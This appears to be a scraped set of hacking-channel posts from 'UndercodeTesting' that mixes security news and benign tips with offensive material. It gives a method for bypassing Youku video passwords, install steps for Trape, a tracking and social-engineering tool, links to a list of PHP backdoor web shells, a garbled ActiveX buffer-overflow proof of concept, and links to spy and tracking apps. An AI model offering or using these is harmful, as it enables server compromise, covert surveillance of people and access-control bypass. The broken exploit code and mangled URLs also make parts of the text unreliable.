▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Youku video cracking method with password :

1) You can set independent playback passwords for videos on Youku website, but you know: You don’t need a password to watch Youku videos with a password. The following describes two methods for cracking Youku video password.

Youku video password cracking 1:

2) Open the FLV analysis website, which is recommended here: http://www.flvcd.com, copy the Youku video address to be decrypted from the browser address bar, and paste the video address into the address box of the FLV analysis website , Click "Start GO to analyze. Get the real download address of the video file, right-click the download address, and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc. to download, the speed is very fast).

3)Youku Video Password cracking method 2:

Just add "xia" (without double quotes) in front of the video address youku. For example, http://v.youku.comv_sohw/id_xntg1mzc4ndq=.html, just change it to http://v .xiayouku.com/v_show/id_xntg1mzc4ndq=.html, the real download address of the video file can be parsed by typing in the browser. The next operation is the same as step 3 of method 1.


Use for Learn !!
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Vulnerability in Cisco SD-WAN.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A GOOD WORKING TRACKING TOOL 2020 :

Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt

4) python2 -m pip install -r requirements.txt
Example of execution

🦑Example: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS

user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MalConfScan: Volatility plugin to extract configuration data for known malware:

Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan has a function for displaying a list of strings referenced by malicious code.

Configuration data is usually encoded by malware.

The malware writes decoded configuration data to memory, it may be in memory.

This function can list decoded configuration data.

🦑https://github.com/JPCERTCC/MalConfScan/wiki/how-to-install

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to install Apache mod_cloudflare on Debian ?

1) Cloudflare provides an official module for Apache server to capture real IP address.

2) Add GPG - Open Terminal and run the following commands to enable adding the gpg key to your system.

sudo apt install curl

curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -

Add PPA - then add cloudflare repository to your debian system

echo "deb http://pkg.cloudflare.com/ lsb_release -cs main" |
sudo tee /etc/apt/sources.list.d/cloudflare.list

3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update

sudo apt install libapache2-mod-cloudflare

4) Press "Y" to confirm the request during installation.
Restart Apache

5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.

sudo systemctl restart apache2
It's all.

6) The Apache server now logs the visitor's real IP address.
sudo apache2ctl -M
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Preview of Apple Conference in November.
#Technologies

READ MORE - https://undercodenews.com/preview-of-apple-conference-in-november/07/11/2020/

New Unpatched IBM QRadar SIEM vulnerability could allow a attacker can bypass access restrictions to data.
#Vulnerabilities

READ MORE - https://undercodenews.com/new-unpatched-ibm-qradar-siem-vulnerability-could-allow-a-attacker-can-bypass-access-restrictions-to-data/07/11/2020/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 GPS TRACKING APPLICATIONS:

https://play.google.com/store/apps/details?id=com.gpsmapcamera.geotagginglocationonphoto&hl=en

https://play.google.com/store/apps/details?id=org.findmykids.app&hl=en_IN

https://apps.apple.com/us/app/google-maps-transit-food/id585027354

https://play.google.com/store/apps/details?id=com.google.android.apps.maps&hl=en_US

https://apps.apple.com/us/app/famisafe-parental-control/id1385417904

https://play.google.com/store/apps/details?id=com.wondershare.famisafe

https://apps.apple.com/us/app/life360-family-locator/id384830320

https://play.google.com/store/apps/details?id=com.life360.android.safetymapd&hl=en

https://my.spyzie.com/signup.html

https://apps.apple.com/us/app/glympse-share-your-location/id330316698

https://play.google.com/store/apps/details?id=com.glympse.android.glympse

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches

New Critical unpatched Vulnerability in Micro Focus can leak the password login.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is PaaS?

1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.

2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.

3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.

4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.

5) The PaaS environment is based on a shared security model.

6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.

This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.

Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP backdoors shells new:

[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

B374K Shell

[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

R57 Shell

[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

0byt3m1n1 Shell

[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

AK-47 Shell

[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

Marion001 Shell

[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

p0wny-shell

[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

Webadmin Shell

[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

LazyShell

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to create a hidden folder with password in Win system:

1) First create a folder and name it "hidden files";

2) Then open the folder, then right-click the mouse in the blank area of ​​the window and select the "New → Text Document" command to create a text file;

3) Copy the following code into the newly created text file:

@ECHO OFF
　　title Folder Private
　　if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
　　if NOT EXIST Private goto MDLOCKER
　　:CONFIRM
　　echo Are you sure you want to lock the folder(Y/N)
　　set/p "cho=>"
　　if %cho%==Y goto LOCK
　　if %cho%==y goto LOCK
　　if %cho%==n goto END
　　if %cho%==N goto END
　　echo Invalid choice.
　　goto CONFIRM
　　:LOCK
　　ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　echo Folder locked
　　goto End
　　:UNLOCK
　　echo Enter password to unlock folder
　　set/p "pass=>"
　　if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
　　attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
　　echo Folder Unlocked successfully
　　goto End
　　:FAIL
　　echo Invalid password
　　goto end
　　:MDLOCKER
　　md Private
　　echo Private created successfully
　　goto End
　　:End
4) replace "PASSWORD_GOES_HERE" with the password you want, such as: 12345, the final effect is: if NOT %pass%== 12345 goto FAIL;

5) Then save the text file as .bat format, the file name can be set to "locker.bat", reminder, set the save type to "all files" to save successfully;

6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this time, we found that the folder is hidden

@UndercodeTesting
don't clone our tips:)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';


var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

💉 App security tips for mobile, web, and desktop apps :

1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.

Make sure there are no known vulnerabilities in your application.

It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.

2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.

Security testing doesn't slow down the development process.

Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.

Therefore, consider checking the security of your applications before going into production.

3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.

This program allows your organization to find and fix bugs before they become known to the public or known hackers.

This way you can prevent incidents.

4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.

Knowledge of cybersecurity can help your organization counter the threats of your applications.

5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.

Consider using an automated scanner to scan that will run tests daily.

You can also use vulnerability scanning tools that are automated.

Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.

6) Think Before Using Open Source In Your Application
open source can be vulnerable.

Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.

So think twice before using open source in your application.

Riskemy.com says, "Just one line of broken code can destroy an entire site."

7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.

8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.

Penetration testing is useful for protecting cybercriminal applications.

Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁